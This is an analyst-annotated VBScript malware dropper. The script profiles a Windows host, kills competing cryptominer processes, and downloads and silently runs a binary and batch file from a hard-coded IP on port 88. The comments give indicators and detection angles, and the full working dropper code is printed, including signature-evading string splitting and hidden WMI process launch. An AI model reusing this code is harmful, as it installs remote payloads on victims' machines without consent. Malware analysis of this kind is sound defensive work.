' Analyst note: start of a VBScript dropper. The leading "- " on each code line is
' list markup from the paste page, not part of the script.
' Errors are suppressed from here on, so any step that fails below is skipped silently.
- On Error Resume Next
- Dim OSlag,OSver,numcpus,objOutParams,objWMIREGService
' Host profiling through the WMI registry provider (StdRegProv in root\DEFAULT).
' &H80000002 is HKEY_LOCAL_MACHINE. The three values read (default language ID,
' Windows version, processor count) are stored in OSlag/OSver/numcpus but are not
' used anywhere else in the visible listing.
- Set objWMIREGService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\DEFAULT:StdRegProv")
- objOutParams = objWMIREGService.GetStringValue(&H80000002, "SYSTEM\CurrentControlSet\Control\Nls\Language", "Default",OSlag)
- objOutParams = objWMIREGService.GetStringValue(&H80000002, "SOFTWARE\Microsoft\Windows NT\CurrentVersion", "CurrentVersion",OSver)
- objOutParams = objWMIREGService.GetStringValue(&H80000002, "SYSTEM\CurrentControlSet\Control\Session Manager\Environment", "NUMBER_OF_PROCESSORS",numcpus)
' windir receives the Windows folder (special folder 0); the top-level code does not
' reference it again in the visible listing.
- Set objFSO = CreateObject("Scripting.FileSystemObject")
- windir = objFSO.GetSpecialFolder(0)
' needdl = 1 means "payload still has to be downloaded"; the process scan later in
' the script clears it when a matching process is already running.
- Dim needdl
- needdl = 1
' Eight hard-coded browser User-Agent strings (the last two are identical). dl() sends
' one of them with its HTTP request, so proxy logs will show a browser-like User-Agent
' rather than the WinHTTP default.
- user_agent_list=array("Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)", _
- "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)", _
- "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16", _
- "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11", _
- "Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15", _
- "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b13pre) Gecko/20110307 Firefox/4.0b13pre", _
- "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)", _
- "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)")
' X is the index into user_agent_list (0 to 7), picked once per run and reused for
' every request made by dl().
- Randomize
- X=CInt(7*Rnd())
' Process scan over local WMI (root\cimv2). The WQL text is assembled from string
' fragments; joined it reads "SELECT * FROM Win32_Process". The split is presumably
' meant to defeat simple string matching, so static rules should not rely on the
' joined query text alone. Flag 48 requests a forward-only, return-immediately enumeration.
- strComputer = "."
- Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
- Set cols=objWMIService.ExecQuery ("SEL" & "ECT * FR" & "OM Win3" & "2_Pr" & "ocess", , 48)
' First pass: terminate every process whose command line contains "-manliana" or
' whose image path contains "smssm.exe". The listing does not say what these are;
' they look like markers of another (or an older) payload -- confirm against samples.
- For Each objItemm in cols
- If InStr(1,LCase(objItemm.CommandLine), LCase("-manliana")) > 0 Then objItemm.Terminate
- If InStr(1,LCase(objItemm.ExecutablePath), LCase("smssm.exe")) > 0 Then objItemm.Terminate
- Next
' Fixed 5-second pause before the second enumeration.
- wscript.sleep 5000
- Set colProcessList1=objWMIService.ExecQuery ("SEL" & "ECT * FR" & "OM Win3" & "2_Pr" & "ocess", , 48)
- For Each objItem in colProcessList1
' Two hard-coded strings (they look like cryptocurrency wallet addresses -- not
' verifiable from this page). If either appears on any command line, needdl is
' cleared and the download stage is skipped. Both strings are useful hunt terms
' for process command-line telemetry.
- If InStr(1,objItem.CommandLine, "CGX2U2oeocN3DTJhyPG2cPg7xpRRTzNZkz") > 0 Then needdl = 0
- If InStr(1,objItem.CommandLine, "CcTzQsSWvf1zhbMA3kf2rpYxogEMcVjmJ3") > 0 Then needdl = 0
' Any process with a Stratum pool URL ("stratum+tcp://") on its command line is
' terminated. This runs regardless of the two checks above, so a process that
' matched one of the hard-coded strings is terminated here too if its command line
' also carries a stratum URL.
- If InStr(1,LCase(objItem.CommandLine), "stratum+tcp://") > 0 Then
- objItem.Terminate
- End If
' notsyspath: True unless the image path is one of five named system32 binaries
' (lsass, services, csrss, winlogon, smss).
' hcline: True when the command line contains "-datadir=", "ypool.net" or "stratum+tcp://".
- notsyspath = not(InStr(1,LCase(objItem.ExecutablePath),"c:\windows\system32\lsass.exe") > 0 or InStr(1,LCase(objItem.ExecutablePath),"c:\windows\system32\services.exe") > 0 or InStr(1,LCase(objItem.ExecutablePath),"c:\windows\system32\csrss.exe") > 0 or InStr(1,LCase(objItem.ExecutablePath),"c:\windows\system32\winlogon.exe") > 0 or InStr(1,LCase(objItem.ExecutablePath),"c:\windows\system32\smss.exe") > 0)
- hcline = InStr(1,LCase(objItem.CommandLine), "-datadir=") > 0 Or InStr(1,LCase(objItem.CommandLine), "ypool.net") > 0 Or InStr(1,LCase(objItem.CommandLine), "stratum+tcp://") > 0
' NOTE(analysis): the call below is made on objProcess, which is never assigned in
' the visible listing. With On Error Resume Next active the failure is swallowed, so
' as written this branch does not terminate anything.
- if notsyspath and hcline then
- objProcess.Terminate
- End If
- Next
' Download-and-execute stage; runs only when the process scan left needdl at 1.
' Indicators visible in this block:
'   network: plain HTTP to 66.186.188.227 on port 88, paths /32.exe, /64.exe, /mst.bat
'   files:   c:\windows\temp\mstdc.exe (binary), c:\windows\temp\sst.bat (batch file)
' The binary is picked by the architecture string from X86orX64(); the batch file is
' the same for both branches and is what actually gets launched (hidden, via runprg).
' The contents of mst.bat are not on this page, so what it does with mstdc.exe is
' unknown here. If X86orX64() returns anything other than "x86" or "x64", nothing is
' downloaded.
' The script exits right after starting the batch file.
- If needdl = 1 Then
- OStype = X86orX64()
- if OStype = "x86" Then
- dl "http://66.186.188.227:88/32.exe","c:\windows\temp\mstdc.exe"
- dl "http://66.186.188.227:88/mst.bat","c:\windows\temp\sst.bat"
- runprg "c:\windows\temp\sst.bat"
- WScript.Quit
- ElseIf OStype = "x64" Then
- dl "http://66.186.188.227:88/64.exe","c:\windows\temp\mstdc.exe"
- dl "http://66.186.188.227:88/mst.bat","c:\windows\temp\sst.bat"
- runprg "c:\windows\temp\sst.bat"
- WScript.Quit
- End If
- End If
' dl(u, f): fetch URL u with an HTTP GET and write the raw response body to path f.
'   u - URL to request
'   f - destination file path; an existing file is overwritten (SaveToFile mode 2)
' The two COM ProgIDs are concatenated from fragments; joined they read
' "WinHttp.WinHttpRequest.5.1" and "Adodb.Stream". Presumably split to avoid simple
' string signatures.
' The request is synchronous (third argument of Open is 0) and carries the User-Agent
' selected by the global index X. The HTTP status is never checked, so whatever body
' the server returns is written to disk as-is.
' Detection angle: a script host loading WinHTTP, followed by a new file written
' through ADODB.Stream in binary mode (.type = 1).
- Function dl(u,f)
- dim xHttp:Set xHttp = createobject("WinH" & "ttp.WinHt" & "tpRequ" & "est.5.1")
- dim bStrm:Set bStrm = createobject("Ad" & "od" & "b.S" & "tre" & "am")
- xHttp.Open "GET",u, 0
- xHttp.SetRequestHeader "User-Agent", user_agent_list(X)
- xHttp.Send
- with bStrm
- .type = 1
- .open
- .write xHttp.responseBody
- .savetofile f,2
- .close
- end with
- End Function
' runprg(ppath): start ppath as a new process through WMI (Win32_Process.Create)
' instead of a direct shell call.
'   ppath - command line to execute
' ShowWindow = 0 in the Win32_ProcessStartup object asks for a hidden window.
' The Create result lands in objOutParams and is never inspected, so the caller gets
' no indication of whether the launch worked.
' Detection angle: processes created this way are normally parented by the WMI
' provider host rather than by the script host, so parent/child rules keyed on
' wscript.exe or cscript.exe alone may miss the launch -- verify in your telemetry.
- Function runprg(ppath)
- Set objPS = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\CIMV2")
- Set objStartup = objPS.Get("Win32_ProcessStartup")
- Set objConfig = objStartup.SpawnInstance_()
- objConfig.ShowWindow = 0
- Set objShare = objPS.Get("Win32_Process")
- Set objInParam = objShare.Methods_("Create").inParameters.SpawnInstance_()
- objInParam.Properties_.Item("CommandLine") = ppath
- objInParam.Properties_.Item("ProcessStartupInformation") = objConfig
- Set objOutParams = objPS.ExecMethod("Win32_Process", "Create", objInParam)
- End Function
' X86orX64(): classify the host architecture from Win32_ComputerSystem.SystemType.
' Returns "x86" when SystemType contains "86", "x64" when it contains "64", otherwise
' the raw SystemType string. The "86" test runs first, so a value containing both
' substrings is reported as "x86".
' If the query returns several items, the last one decides the result; if it returns
' none (or fails under On Error Resume Next), the function returns an empty value.
- Function X86orX64()
- On Error Resume Next
- strComputer = "."
- Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
- Set colItems = objWMIService.ExecQuery("Select * from Win32_ComputerSystem",,48)
- For Each objItem in colItems
- If InStr(objItem.SystemType, "86") <> 0 Then
- X86orX64 = "x86"
- ElseIf InStr(objItem.SystemType, "64") <> 0 Then
- X86orX64 = "x64"
- Else
- X86orX64 = objItem.SystemType
- End If
- Next
- End Function
' wlog(slog): write one line of text to <Windows folder>\wb2010kb.log.
'   slog - text to write
' CreateTextFile is called with overwrite enabled (second argument 1), so the file
' holds only the most recent line.
' Nothing in the visible listing calls wlog, so the file may never appear on a host
' that ran exactly this script. The name resembles a Windows update log -- presumably
' chosen to blend in; treat the path as a weak indicator only.
- Function wlog(slog)
- Set objFSO = CreateObject("Scripting.FileSystemObject")
- windir = objFSO.GetSpecialFolder(0)
- Set f = objFSO.CreateTextFile(windir + "\wb2010kb.log",1)
- f.WriteLine(slog)
- f.Close
- Set objFSO = Nothing
- End Function